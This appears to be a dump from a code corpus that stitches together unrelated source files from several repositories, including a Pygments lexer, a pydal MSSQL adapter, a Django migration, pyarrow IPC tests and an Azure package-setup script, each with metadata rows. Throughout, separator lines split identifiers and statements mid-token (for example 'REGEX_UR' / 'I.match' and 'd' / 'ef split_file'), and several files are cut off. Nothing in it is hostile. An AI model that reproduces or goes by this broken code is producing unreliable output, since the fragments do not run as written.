(r'(\t\t\t)('+hex+r'+:)( )([^\t]+)(\t)(.*?)([-+])(0x' + hex + '+)$',
bygroups(Text, Name.Label, Text, Name.Property, Text,
Name.Constant, Punctuation, Number.Hex)),
# (Without offset)
(r'(\t\t\t)('+hex+r'+:)( )([^\t]+)(\t)(.*?)$',
bygroups(Text, Name.Label, Text, Name.Property, Text,
Name.Constant)),
(r'
|
[^\n]+\n', Other)
|
]
}
class DObjdumpLexer(DelegatingLexer):
"""
For the output of 'objdump -Sr on compiled D files'
"""
name = 'd-objdump'
aliases = ['d-objdump']
filenames = ['*.d-objdump']
mimetypes = ['text/x-d-objdump']
def __init__(self, **options):
super(DObjdumpLexer, self).__init__(DLexer, ObjdumpLexer, **options)
class CppObjdumpLexer(DelegatingLexer):
"""
For the output of 'objdump -Sr on compiled C++ files'
"""
name = 'cpp-objdump'
aliases = ['cpp-objdump', 'c++-objdumb', 'cxx-objdump']
filenames = ['*.cpp-objdump', '*.c++-objdump', '*.cxx-objdump']
mimetypes = ['text/x-cpp-objdump']
def __init__(self, **options):
super(CppObjdumpLexer, self).__init__(CppLexer, ObjdumpLexer, **options)
class CObjdumpLexer(DelegatingLexer):
"""
For the output of 'objdump -Sr on compiled C files'
"""
name = 'c-objdump'
aliases = ['c-objdump']
filenames = ['*.c-objdump']
mimetypes = ['text/x-c-objdump']
def __init__(self, **options):
super(CObjdumpLexer, self).__init__(CLexer, ObjdumpLexer, **options)
class LlvmLexer(RegexLexer):
"""
For LLVM assembly code.
"""
name = 'LLVM'
aliases = ['llvm']
filenames = ['*.ll']
mimetypes = ['text/x-llvm']
#: optional Comment or Whitespace
string = r'"[^"]*?"'
identifier = r'([-a-zA-Z$._][-a-zA-Z$._0-9]*|' + string + ')'
tokens = {
'root': [
include('whitespace'),
# Before keywords, because keywords are valid label names :(...
(identifier + '\s*:', Name.Label),
include('keyword'),
(r'%' + identifier, Name.Variable),#Name.Identifier.Local),
(r'@' + identifier, Name.Variable.Global),#Name.Identifier.Global),
(r'%\d+', Name.Variable.Anonymous),#Name.Identifier.Anonymous),
(r'@\d+', Name.Variable.Global),#Name.Identifier.Anonymous),
(r'!' + identifier, Name.Variable),
(r'!\d+', Name.Variable.Anonymous),
(r'c?' + string, String),
(r'0[xX][a-fA-F0-9]+', Number),
(r'-?\d+(?:[.]\d+)?(?:[eE][-+]?\d+(?:[.]\d+)?)?', Number),
(r'[=<>{}\[\]()*.,!]|x\b', Punctuation)
],
'whitespace': [
(r'(\n|\s)+', Text),
(r';.*?\n', Comment)
],
'keyword': [
# Regular keywords
(r'(begin|end'
r'|true|false'
r'|declare|define'
r'|global|constant'
r'|private|linker_private|internal|available_externally|linkonce'
r'|linkonce_odr|weak|weak_odr|appending|dllimport|dllexport'
r'|common|default|hidden|protected|extern_weak|external'
r'|thread_local|zeroinitializer|undef|null|to|tail|target|triple'
r'|deplibs|datalayout|volatile|nuw|nsw|exact|inboun
|
stephenrauch/pydal
|
pydal/adapters/mssql.py
|
Python
|
bsd-3-clause
| 6,306
| 0.00111
|
import re
from .._compat import PY2, iteritems, integer_types, to_unicode
from .._globals import IDENTITY
from .base import SQLAdapter
from . import adapters, with_connection_or_raise
long = integer_types[-1]
class Slicer(object):
def rowslice(self, rows, minimum=0, maximum=None):
if maximum is None:
return rows[minimum:]
return rows[minimum:maximum]
class MSSQL(SQLAdapter):
dbengine = 'mssql'
drivers = ('pyodbc',)
REGEX_DSN = re.compile('^(?P<dsn>.+)$')
REGEX_URI = re.compile(
'^(?P<user>[^:@]+)(\:(?P<password>[^@]*))?@(?P<host>\[[^/]+\]|' +
'[^\:/]+)(\:(?P<port>[0-9]+))?/(?P<db>[^\?]+)(\?(?P<urlargs>.*))?$')
REGEX_ARGPATTERN = re.compile('(?P<argkey>[^=]+)=(?P<argvalue>[^&]*)')
def __init__(self, db, uri, pool_size=0, folder=None, db_codec='UTF-8',
credential_decoder=IDENTITY, driver_args={},
adapter_args={}, do_connect=True, srid=4326,
after_connection=None):
self.srid = srid
super(MSSQL, self).__init__(
db, uri, pool_size, folder, db_codec, credential_decoder,
driver_args, adapter_args, do_connect, after_connection)
def _initialize_(self, do_connect):
super(MSSQL, self)._initialize_(do_connect)
ruri = self.uri.split('://', 1)[1]
if '@' not in ruri:
try:
m = self.REGEX_DSN.match(ruri)
if not m:
raise SyntaxError(
'Parsing uri string(%s) has no result' % self.uri)
dsn = m.group('dsn')
if not dsn:
raise SyntaxError('DSN required')
except SyntaxError as e:
self.db.logger.error('NdGpatch error')
raise e
self.cnxn = dsn
else:
m = self.REGEX_UR
|
I.match(ruri)
if not m:
raise Syntax
|
Error(
"Invalid URI string in DAL: %s" % self.uri)
user = self.credential_decoder(m.group('user'))
if not user:
raise SyntaxError('User required')
password = self.credential_decoder(m.group('password'))
if not password:
password = ''
host = m.group('host')
if not host:
raise SyntaxError('Host name required')
db = m.group('db')
if not db:
raise SyntaxError('Database name required')
port = m.group('port') or '1433'
# Parse the optional url name-value arg pairs after the '?'
# (in the form of arg1=value1&arg2=value2&...)
# (drivers like FreeTDS insist on uppercase parameter keys)
argsdict = {'DRIVER': '{SQL Server}'}
urlargs = m.group('urlargs') or ''
for argmatch in self.REGEX_ARGPATTERN.finditer(urlargs):
argsdict[str(argmatch.group('argkey')).upper()] = \
argmatch.group('argvalue')
urlargs = ';'.join([
'%s=%s' % (ak, av) for (ak, av) in iteritems(argsdict)])
self.cnxn = 'SERVER=%s;PORT=%s;DATABASE=%s;UID=%s;PWD=%s;%s' \
% (host, port, db, user, password, urlargs)
def connector(self):
return self.driver.connect(self.cnxn, **self.driver_args)
def lastrowid(self, table):
self.execute('SELECT SCOPE_IDENTITY();')
return long(self.cursor.fetchone()[0])
@adapters.register_for('mssql')
class MSSQL1(MSSQL, Slicer):
pass
@adapters.register_for('mssql3')
class MSSQL3(MSSQL):
pass
@adapters.register_for('mssql4')
class MSSQL4(MSSQL):
pass
class MSSQLN(MSSQL):
def represent(self, obj, field_type):
rv = super(MSSQLN, self).represent(obj, field_type)
if field_type in ('string', 'text', 'json') and rv[:1] == "'":
rv = 'N' + rv
return rv
@with_connection_or_raise
def execute(self, *args, **kwargs):
if PY2:
args = list(args)
args[0] = to_unicode(args[0])
return super(MSSQLN, self).execute(*args, **kwargs)
@adapters.register_for('mssqln', 'mssql2')
class MSSQL1N(MSSQLN, Slicer):
pass
@adapters.register_for('mssql3n')
class MSSQL3N(MSSQLN):
pass
@adapters.register_for('mssql4n')
class MSSQL4N(MSSQLN):
pass
@adapters.register_for('vertica')
class Vertica(MSSQL1):
def lastrowid(self, table):
self.execute('SELECT SCOPE_IDENTITY();')
return long(self.cursor.fetchone()[0])
@adapters.register_for('sybase')
class Sybase(MSSQL1):
dbengine = 'sybase'
def _initialize_(self, do_connect):
super(MSSQL, self)._initialize_(do_connect)
ruri = self.uri.split('://', 1)[1]
if '@' not in ruri:
try:
m = self.REGEX_DSN.match(ruri)
if not m:
raise SyntaxError(
'Parsing uri string(%s) has no result' % self.uri)
dsn = m.group('dsn')
if not dsn:
raise SyntaxError('DSN required')
except SyntaxError as e:
self.db.logger.error('NdGpatch error')
raise e
self.cnxn = dsn
else:
m = self.REGEX_URI.match(ruri)
if not m:
raise SyntaxError(
"Invalid URI string in DAL: %s" % self.uri)
user = self.credential_decoder(m.group('user'))
if not user:
raise SyntaxError('User required')
password = self.credential_decoder(m.group('password'))
if not password:
password = ''
host = m.group('host')
if not host:
raise SyntaxError('Host name required')
db = m.group('db')
if not db:
raise SyntaxError('Database name required')
port = m.group('port') or '1433'
self.dsn = 'sybase:host=%s:%s;dbname=%s' % (host, port, db)
self.driver_args.update(
user=self.credential_decoder(user),
passwd=self.credential_decoder(password))
def connector(self):
return self.driver.connect(self.dsn, **self.driver_args)
|
syci/partner-contact
|
partner_contact_job_position/__manifest__.py
|
Python
|
agpl-3.0
| 823
| 0
|
# Copyright 2014 Pedro M. Baeza <pedro.baeza@tecnativa.com>
# Copyright 2015 Antonio Espinosa <antonioea@antiun.com>
# Copyright 2015 Jairo Llopis <jairo.llopis@tecnativa.com>
# Copyright 2017 David Vidal <david.vidal@tecnativa.com>
# License AGPL-3 - See http://www.gnu.org/lic
|
enses/agpl-3.0.html
{
"name": "Partner Job Position",
"summary": "Categorize job positions for contacts",
"version": "13.0.1.0.0",
"category": "Customer Relationship Management",
"website": "https://github.com/OCA/partner-con
|
tact",
"author": "Tecnativa, Odoo Community Association (OCA)",
"license": "AGPL-3",
"installable": True,
"depends": ["contacts"],
"data": [
"security/ir.model.access.csv",
"views/res_partner_job_position_view.xml",
"views/res_partner_view.xml",
],
}
|
dontnod/weblate
|
weblate/wladmin/migrations/0006_auto_20190926_1218.py
|
Python
|
gpl-3.0
| 1,322
| 0
|
# Generated by Django 2.2.5 on 2019-09-26 12:18
from django.db import migrations, models
import weblate.utils.backup
class Migration(migrations.Migration):
dependencies = [("wladmin", "0005_auto_20190926_1332")]
operations = [
migrations.AddField(
model_name="backupservice",
name="paperkey",
field=models.TextField(default=""),
preserve_default=False,
),
migrations.AddField(
|
model_name="backupservice",
name="passphrase",
field=models.CharField(
default=weblate.utils.backup.make_password, max_length=100
|
),
),
migrations.AlterField(
model_name="backuplog",
name="event",
field=models.CharField(
choices=[
("backup", "Backup performed"),
("prune", "Deleted the oldest backups"),
("init", "Repository initialization"),
],
max_length=100,
),
),
migrations.AlterField(
model_name="backupservice",
name="repository",
field=models.CharField(
default="", max_length=500, verbose_name="Backup repository"
),
),
]
|
Winawer/exercism
|
python/house/house.py
|
Python
|
cc0-1.0
| 886
| 0.022573
|
parts = (('house', 'Jack built'),
('malt', 'lay in'),
('rat', 'ate'),
('cat', 'killed'),
('dog', 'worried'),
('cow with the crumpled horn', 'tossed'),
('maiden all forlorn', 'milked'),
('man all tattered and torn', 'kissed'),
('priest all shaven and shorn', 'married'),
('rooster that crowed in the morn', 'woke'),
|
('farmer sowing his corn', 'kept'),
('horse and the hound and the horn', 'belonged to'))
def verse(n)
|
:
return '{}\nthat {}'.format(parts[n][0],parts[n][1]) if n != 0 else '{} that {}'.format(parts[n][0],parts[n][1])
def rhymes(v = 11):
if v == 0:
return verse(v)
else:
return verse(v) + ' the ' + rhymes(v-1)
def rhyme():
return '\n'.join([ 'This is the ' + rhymes(v) + '.\n' for v in range(12) ])[:-1]
|
krzyste/ud032
|
Lesson_2_Problem_Set/06-Processing_Patents/split_data.py
|
Python
|
agpl-3.0
| 1,803
| 0.004437
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# So, the problem is that the gigantic file is actually not a valid XML, because
# it has several root elements, and XML declarations.
# It is, a matter of fact, a collection of a lot of concatenated XML documents.
# So, one solution would be to split the file into separate documents,
# so that you can process the resulting files as valid XML documents.
import xml.etree.ElementTree as ET
PATENTS = 'patent.data'
def get_root(fname):
tree = ET.parse(fname)
return tree.getroot()
d
|
ef split_file(filename):
# we want you to split the input file into separate files
# each containing a single patent.
# As a hint - each patent declaration starts with the same line that was causing the error
|
# The new files should be saved with filename in the following format:
# "{}-{}".format(filename, n) where n is a counter, starting from 0.
indexes = []
with open(PATENTS, "r") as f:
lines = f.readlines()
for i, line in enumerate(lines):
if "?xml" in line:
indexes.append(i)
for i, index in enumerate(indexes):
fname = "{}-{}".format(PATENTS, i)
f = open(fname, "w")
if index != indexes[-1]:
f.writelines(lines[index:indexes[i+1]])
else:
f.writelines(lines[index:])
f.close()
def test():
split_file(PATENTS)
for n in range(4):
try:
fname = "{}-{}".format(PATENTS, n)
f = open(fname, "r")
if not f.readline().startswith("<?xml"):
print "You have not split the file {} in the correct boundary!".format(fname)
f.close()
except:
print "Could not find file {}. Check if the filename is correct!".format(fname)
test()
|
ismangil/pjproject
|
tests/pjsua/scripts-sipp/uas-answer-183-without-to-tag.py
|
Python
|
gpl-2.0
| 138
| 0
|
# $Id$
#
import inc_const as const
PJSUA = ["--null-audio --max-calls=1 --no-tcp $SIPP_URI"]
PJSUA_EXPECT
|
S = [[0, "Audio updated"
|
, ""]]
|
hackerspace-silesia/cebulany-manager
|
setup.py
|
Python
|
mit
| 495
| 0
|
import os
from setuptools import setup, find_packages
here = os.path.abs
|
path(os.path.dirname(__file__))
with open(os.path.join(here, 'requirements.txt')) as fp:
requires = fp.readlines()
setup(
name='cebulany manager',
version='0.0.4',
classifiers=[],
author='Firem
|
ark',
author_email='marpiechula@gmail.com',
url='https://github.com/hackerspace-silesia/cebulany-manager',
packages=find_packages(),
install_requires=requires,
tests_require=requires,
)
|
wndias/bc.repository
|
plugin.video.superlistamilton/service.py
|
Python
|
gpl-2.0
| 837
| 0.001195
|
# -*- coding: utf-8 -*-
'''
Genesis Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public Licen
|
se as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public Licens
|
e
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import xbmc
xbmc.executebuiltin('RunPlugin(plugin://plugin.video.superlistamilton/?action=service)')
|
xhochy/arrow
|
python/pyarrow/tests/test_ipc.py
|
Python
|
apache-2.0
| 27,938
| 0
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional in
|
formation
# regarding copyright ownership. The ASF licenses this file
# to you under t
|
he Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from collections import UserList
import io
import pytest
import socket
import sys
import threading
import weakref
import numpy as np
import pyarrow as pa
from pyarrow.tests.util import changed_environ
try:
from pandas.testing import assert_frame_equal, assert_series_equal
import pandas as pd
except ImportError:
pass
# TODO(wesm): The IPC tests depend a lot on pandas currently, so all excluded
# when it is not installed
pytestmark = pytest.mark.pandas
class IpcFixture:
def __init__(self, sink_factory=lambda: io.BytesIO()):
self._sink_factory = sink_factory
self.sink = self.get_sink()
def get_sink(self):
return self._sink_factory()
def get_source(self):
return self.sink.getvalue()
def write_batches(self, num_batches=5, as_table=False):
nrows = 5
df = pd.DataFrame({
'one': np.random.randn(nrows),
'two': ['foo', np.nan, 'bar', 'bazbaz', 'qux']})
batch = pa.record_batch(df)
writer = self._get_writer(self.sink, batch.schema)
frames = []
batches = []
for i in range(num_batches):
unique_df = df.copy()
unique_df['one'] = np.random.randn(len(df))
batch = pa.record_batch(unique_df)
frames.append(unique_df)
batches.append(batch)
if as_table:
table = pa.Table.from_batches(batches)
writer.write_table(table)
else:
for batch in batches:
writer.write_batch(batch)
writer.close()
return frames, batches
class FileFormatFixture(IpcFixture):
def _get_writer(self, sink, schema):
return pa.ipc.new_file(sink, schema)
def _check_roundtrip(self, as_table=False):
_, batches = self.write_batches(as_table=as_table)
file_contents = pa.BufferReader(self.get_source())
reader = pa.ipc.open_file(file_contents)
assert reader.num_record_batches == len(batches)
for i, batch in enumerate(batches):
# it works. Must convert back to DataFrame
batch = reader.get_batch(i)
assert batches[i].equals(batch)
assert reader.schema.equals(batches[0].schema)
class StreamFormatFixture(IpcFixture):
# ARROW-6474, for testing writing old IPC protocol with 4-byte prefix
use_legacy_ipc_format = False
# ARROW-9395, for testing writing old metadata version
options = None
def _get_writer(self, sink, schema):
return pa.ipc.new_stream(
sink,
schema,
use_legacy_format=self.use_legacy_ipc_format,
options=self.options,
)
class MessageFixture(IpcFixture):
def _get_writer(self, sink, schema):
return pa.RecordBatchStreamWriter(sink, schema)
@pytest.fixture
def ipc_fixture():
return IpcFixture()
@pytest.fixture
def file_fixture():
return FileFormatFixture()
@pytest.fixture
def stream_fixture():
return StreamFormatFixture()
def test_empty_file():
buf = b''
with pytest.raises(pa.ArrowInvalid):
pa.ipc.open_file(pa.BufferReader(buf))
def test_file_simple_roundtrip(file_fixture):
file_fixture._check_roundtrip(as_table=False)
def test_file_write_table(file_fixture):
file_fixture._check_roundtrip(as_table=True)
@pytest.mark.parametrize("sink_factory", [
lambda: io.BytesIO(),
lambda: pa.BufferOutputStream()
])
def test_file_read_all(sink_factory):
fixture = FileFormatFixture(sink_factory)
_, batches = fixture.write_batches()
file_contents = pa.BufferReader(fixture.get_source())
reader = pa.ipc.open_file(file_contents)
result = reader.read_all()
expected = pa.Table.from_batches(batches)
assert result.equals(expected)
def test_open_file_from_buffer(file_fixture):
# ARROW-2859; APIs accept the buffer protocol
_, batches = file_fixture.write_batches()
source = file_fixture.get_source()
reader1 = pa.ipc.open_file(source)
reader2 = pa.ipc.open_file(pa.BufferReader(source))
reader3 = pa.RecordBatchFileReader(source)
result1 = reader1.read_all()
result2 = reader2.read_all()
result3 = reader3.read_all()
assert result1.equals(result2)
assert result1.equals(result3)
def test_file_read_pandas(file_fixture):
frames, _ = file_fixture.write_batches()
file_contents = pa.BufferReader(file_fixture.get_source())
reader = pa.ipc.open_file(file_contents)
result = reader.read_pandas()
expected = pd.concat(frames).reset_index(drop=True)
assert_frame_equal(result, expected)
@pytest.mark.skipif(sys.version_info < (3, 6),
reason="need Python 3.6")
def test_file_pathlib(file_fixture, tmpdir):
import pathlib
_, batches = file_fixture.write_batches()
source = file_fixture.get_source()
path = tmpdir.join('file.arrow').strpath
with open(path, 'wb') as f:
f.write(source)
t1 = pa.ipc.open_file(pathlib.Path(path)).read_all()
t2 = pa.ipc.open_file(pa.OSFile(path)).read_all()
assert t1.equals(t2)
def test_empty_stream():
buf = io.BytesIO(b'')
with pytest.raises(pa.ArrowInvalid):
pa.ipc.open_stream(buf)
def test_stream_categorical_roundtrip(stream_fixture):
df = pd.DataFrame({
'one': np.random.randn(5),
'two': pd.Categorical(['foo', np.nan, 'bar', 'foo', 'foo'],
categories=['foo', 'bar'],
ordered=True)
})
batch = pa.RecordBatch.from_pandas(df)
with stream_fixture._get_writer(stream_fixture.sink, batch.schema) as wr:
wr.write_batch(batch)
table = (pa.ipc.open_stream(pa.BufferReader(stream_fixture.get_source()))
.read_all())
assert_frame_equal(table.to_pandas(), df)
def test_open_stream_from_buffer(stream_fixture):
# ARROW-2859
_, batches = stream_fixture.write_batches()
source = stream_fixture.get_source()
reader1 = pa.ipc.open_stream(source)
reader2 = pa.ipc.open_stream(pa.BufferReader(source))
reader3 = pa.RecordBatchStreamReader(source)
result1 = reader1.read_all()
result2 = reader2.read_all()
result3 = reader3.read_all()
assert result1.equals(result2)
assert result1.equals(result3)
def test_stream_write_dispatch(stream_fixture):
# ARROW-1616
df = pd.DataFrame({
'one': np.random.randn(5),
'two': pd.Categorical(['foo', np.nan, 'bar', 'foo', 'foo'],
categories=['foo', 'bar'],
ordered=True)
})
table = pa.Table.from_pandas(df, preserve_index=False)
batch = pa.RecordBatch.from_pandas(df, preserve_index=False)
with stream_fixture._get_writer(stream_fixture.sink, table.schema) as wr:
wr.write(table)
wr.write(batch)
table = (pa.ipc.open_stream(pa.BufferReader(stream_fixture.get_source()))
.read_all())
assert_frame_equal(table.to_pandas(),
pd.concat([df, df], ignore_index=True))
def test_stream_write_table_batches(stream_fixture):
# ARROW-504
df = pd.DataFrame({
'one': np.random.randn(20),
})
b1 = pa.RecordBatch.from_pandas(df[:10], preserve_index=False)
b2 = pa.RecordBatch.from_pandas(df, preserve_index=False)
table = pa.Table.from_batches([b1, b2, b1])
w
|
Azure/azure-linux-automation
|
remote-scripts/SETUP-INSTALL-PACKAGES.py
|
Python
|
apache-2.0
| 22,500
| 0.014622
|
#!/usr/bin/python
from azuremodules import *
import sys
import shutil
import time
import re
import os
import linecache
import imp
import os.path
import zipfile
current_distro = "unknown"
distro_version = "unknown"
sudo_password = ""
startup_file = ""
rpm_links = {}
tar_link = {}
current_distro = "unknown"
packages_list_xml = "./packages.xml"
python_cmd="python"
waagent_cmd="waagent"
waagent_bin_path="/usr/sbin"
def set_variables_OS_dependent():
global current_distro
global distro_version
global startup_file
global python_cmd
global waagent_cmd
global waagent_bin_path
RunLog.info ("\nset_variables_OS_dependent ..")
[current_distro, distro_version] = DetectDistro()
if(current_distro == 'unknown'):
RunLog.error ("unknown distribution found, exiting")
ResultLog.info('ABORTED')
exit()
if(current_distro == "ubuntu" or current_distro == "debian"):
startup_file = '/etc/rc.local'
elif(current_distro == "centos" or current_distro == "rhel" or current_distro == "fedora" or current_distro == "Oracle"):
startup_file = '/etc/rc.d/rc.local'
elif(current_distro == "SUSE" or "sles" in current_distro or current_distro == "opensuse"):
startup_file = '/etc/rc.d/after.local'
if(current_distro == "coreos"):
python_cmd="/usr/share/oem/python/bin/python"
waagent_bin_path="/usr/share/oem/bin/python"
waagent_cmd= "{0} {1}".format(python_cmd, waagent_bin_path)
Run("echo 'checking python version' >> PackageStatus.txt")
retcode, output = RunGetOutput('{0} --version | grep Python'.format(waagent_cmd))
if retcode == 0 and 'Python: 3.' in output:
python_cmd = 'python3'
Run("echo 'using [{0}]' >> PackageStatus.txt".format(python_cmd))
RunLog.info ("\nset_variables_OS_dependent ..[done]")
def download_and_install_rpm(package):
RunLog.info("Installing Package: " + package+" from rpmlink")
if package in rpm_links:
if DownloadUrl(rpm_links.get(package), "/tmp/"):
if InstallRpm("/tmp/"+re.split("/",rpm_links.get(package))[-1], package):
RunLog.info("Installing Package: " + package+" from rpmlink done!")
return True
RunLog.error("Installing Package: " + package+" from rpmlink failed!!")
return False
def easy_install(package):
RunLog.info("Installing Package: " + package+" via easy_install")
temp = Run("command -v easy_install")
if not ("easy_install" in temp):
install_ez_setup()
if package == "python-crypto":
output = Run("easy_install pycrypto")
return ("Finished" in output)
if package == "python-paramiko":
output = Run("easy_install paramiko")
return ("Finished" in output)
RunLog.error("Installing Package: " + package+" via easy_install failed!!")
return False
def yum_package_install(package):
if(YumPackageInstall(package) == True):
return True
elif(download_and_install_rpm(package) == True):
return True
elif(easy_install(package) == True):
|
return True
else:
return False
def zypper_package_install(package):
if(ZypperPackageInstall(package) == True):
return True
elif(download_and_install_rpm(package) == True):
return True
elif(package == 'gcc'):
return InstallGcc()
else:
return False
def coreos_package_install():
binpath="/usr/share/oem/bin"
pythonlibrary="/usr/share/oem/python/lib64/pyth
|
on2.7"
# create /etc/hosts
ExecMultiCmdsLocalSudo(["touch /etc/hosts",\
"echo '127.0.0.1 localhost' > /etc/hosts",\
"echo '** modify /etc/hosts successfully **' >> PackageStatus.txt"])
# copy tools to bin folder
Run("unzip -d CoreosPreparationTools ./CoreosPreparationTools.zip")
ExecMultiCmdsLocalSudo(["cp ./CoreosPreparationTools/killall " + binpath, \
"cp ./CoreosPreparationTools/iperf " + binpath,\
"cp ./CoreosPreparationTools/iozone " + binpath,\
"cp ./CoreosPreparationTools/dos2unix " + binpath,\
"cp ./CoreosPreparationTools/at " + binpath,\
"chmod 755 "+ binpath + "/*",\
"echo '** copy tools successfully **' >> PackageStatus.txt"])
# copy python library to python library folder
Run("tar zxvf ./CoreosPreparationTools/pycrypto.tar.gz -C "+ pythonlibrary)
ExecMultiCmdsLocalSudo(["tar zxvf ./CoreosPreparationTools/ecdsa-0.13.tar.gz -C ./CoreosPreparationTools",\
"cd ./CoreosPreparationTools/ecdsa-0.13",\
"/usr/share/oem/python/bin/python setup.py install",\
"cd ../.."])
ExecMultiCmdsLocalSudo(["tar zxvf ./CoreosPreparationTools/paramiko-1.15.1.tar.gz -C ./CoreosPreparationTools",\
"cd ./CoreosPreparationTools/paramiko-1.15.1",\
"/usr/share/oem/python/bin/python setup.py install",\
"cd ../..",\
"tar zxvf ./CoreosPreparationTools/pexpect-3.3.tar.gz -C ./CoreosPreparationTools",\
"cd ./CoreosPreparationTools/pexpect-3.3",\
"/usr/share/oem/python/bin/python setup.py install",\
"cd ../.."])
ExecMultiCmdsLocalSudo(["tar zxvf ./CoreosPreparationTools/dnspython-1.12.0.tar.gz -C ./CoreosPreparationTools",\
"cd ./CoreosPreparationTools/dnspython-1.12.0",\
"/usr/share/oem/python/bin/python setup.py install",\
"cd ../.."])
if not os.path.exists (pythonlibrary + "/site-packages/pexpect"):
RunLog.error ("pexpect package installation failed!")
Run("echo '** pexpect package installation failed **' >> PackageStatus.txt")
return False
if not os.path.exists (pythonlibrary + "/site-packages/paramiko"):
RunLog.error ("paramiko packages installation failed!")
Run("echo '** paramiko packages installed failed **' >> PackageStatus.txt")
return False
if not os.path.exists (pythonlibrary + "/site-packages/dns"):
RunLog.error ("dnspython packages installation failed!")
Run("echo '** dnspython packages installed failed **' >> PackageStatus.txt")
return False
RunLog.info ("pexpect, paramiko and dnspython packages installed successfully!")
Run("echo '** pexpect, paramiko and dnspython packages installed successfully **' >> PackageStatus.txt")
return True
def install_ez_setup():
RunLog.info ("Installing ez_setup.py...")
ez_setup = os.path.join("/tmp", "ez_setup.py")
DownloadUrl(tar_link.get("ez_setup.py"), "/tmp/", output_file=ez_setup)
if not os.path.isfile(ez_setup):
RunLog.error("Installing ez_setup.py...[failed]")
RunLog.error("File not found: {0}".format(ez_setup))
return False
output = Run("{0} {1}".format(python_cmd, ez_setup))
return ("Finished" in output)
def InstallGcc():
RunLog.info("Interactive installing Package: gcc")
Run("wget http://pexpect.sourceforge.net/pexpect-2.3.tar.gz;tar xzf pexpect-2.3.tar.gz;cd pexpect-2.3;python ./setup.py install;cd ..")
import pexpect
cmd = 'zypper install gcc'
child = pexpect.spawn(cmd)
fout = file('GccInstallLog.txt','w')
child.logfile = fout
index = child.expect(["(?i)Choose from above solutions by number or cancel", pexpect.EOF, pexpect.TIMEOUT])
if(index == 0):
child.sendline('1')
RunLog.info("choose option 1")
index = child.expect(["(?i)Continue?", pexpect
|
Sauron754/SpaceScript
|
old/testEnvironments/SpaceScript/threadingFunctions.py
|
Python
|
gpl-3.0
| 1,480
| 0.031757
|
import SpaceScript
import multiprocessing
from multiprocessing import Process, Queue, Pipe, Lock
from SpaceScript import frontEnd
from SpaceScript import utility
from SpaceScript.frontEnd import terminal
from SpaceScript.utility import terminalUtility
from SpaceScript.terminal import terminal as terminal
from SpaceScript.utility.terminalUtility import safePull as safePull
from SpaceScript.utility.terminalUtility import termThreadEventHandler as termThreadEventHandler
from SpaceScript.utility.terminalUtility import termThreadControlHandler as termThreadControlHandler
from appJar import gui
def simThread(queues_arr, pipes_arr, holdValue_v, objectArray_arr = None,
mainLock = None):
def termThread(queues_arr, pipes_arr, holdValue_v, objectArray_arr = None,
mainLock = None):
commandPipe = pipes_arr[0]
controlQueue_q = queues_arr[0]
pullString_q = multiprocessing.Queue()
pushString_q = multiprocessing.Queue()
termThreadHold_v = multiprocessi
|
ng.Value()
guiHold_v = multiprocessing.Value()
guiHold_v.value = False
termThreadHold_v.value = False
subProcess = multiprocessing.Process(targe
|
t = terminal, args = (0,
pullString_q, pushString_q,
guiHold_v, termThreadHold_v))
subProcess.start()
checkSequence_bool = True
while checkSequence_bool:
termThreadEventHandler(termThreadHold_v, pullString_q, commandPipe,
holdValue_v)
termThreadControlHandler(termThreadHold_v, controlQueue_q, pushString_q,
guiHold_v)
|
nive/nive
|
nive/components/iface/tests/test_iface.py
|
Python
|
gpl-3.0
| 1,151
| 0.034752
|
# -*- coding: utf-8 -*-
import time
import unittest
from nive.security import User
"""
#totest:
templates/
definitions.py
parts.py
root.py
search.py
view.py
"""
class IfaceTest:#(unittest.TestCase): # TODO tests
def setUp(self):
app = App()
app.SetConfiguration({"objects": [typedef]})
self.c = IFace(app)
def testReg(self):
self.c.RegisterType(typedef)
self.c.RegisterComponent(viewdef)
def testGet(self):
container = Ob()
container.IContainer=1
object = Ob()
addtype = "page"
self.assertTrue(self.c.GetFldsAdd(container, addtype))
self.assertTrue(self.c.GetFldsEdit(object))
self.assertTrue(self.c.GetFldsMetaView(object))
self.assertTrue(self.c.GetFldsDataView(object))
def testSearch(self):
container = Ob()
container.IContainer=1
self.asse
|
rtTrue(self.
|
c.GetSearchConf("", container=container))
self.assertTrue(self.c.GetSearchConf("default", container=container))
def testF(self):
object = Ob()
self.assertTrue(self.c.GetTabs(object))
self.assertTrue(self.c.GetShortcuts(object))
def testRedirect(self):
object = Ob()
self.assertTrue(self.c.GetRedirect("delete", view=object))
|
fidals/refarm-site
|
tests/ecommerce/tests_forms.py
|
Python
|
mit
| 1,163
| 0.00086
|
"""Tests for forms in eCommerce app."""
from django.test import TestCase
from ecommerce.forms import OrderForm
required_fields = {
'phone': '123456789',
'email': 'valid@email.ru',
}
invalid_form_email = {
'email': 'clearly!not_@_email',
'phone': '123456789'
}
no_phone = {'email': 'sss@sss.sss'}
class TestForm(TestCase):
"""Test suite for forms in eCommerce app."""
def test_empty_form(self):
"""Empty form shouldn't be valid."""
form = OrderForm()
|
self.assertFalse(form.is_valid())
def test_filled_form_without_required_field(self):
"""Form is still not valid, if there are some required fiel
|
ds left unfilled."""
form = OrderForm(data=no_phone)
self.assertFalse(form.is_valid())
def test_valid_form(self):
"""Form is valid, if there all required fields are filled."""
form = OrderForm(data=required_fields)
self.assertTrue(form.is_valid())
def test_from_validation_on_email_field(self):
"""Form should validate user's email if it is filled."""
form = OrderForm(data=invalid_form_email)
self.assertFalse(form.is_valid())
|
hgdeoro/pilas
|
pilasengine/fondos/__init__.py
|
Python
|
lgpl-3.0
| 2,302
| 0.000435
|
# -*- encoding: utf-8 -*-
# pilas engine: un motor para hacer videojuegos
#
# Copyright 2010-2014 - Hugo Ruscitti
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
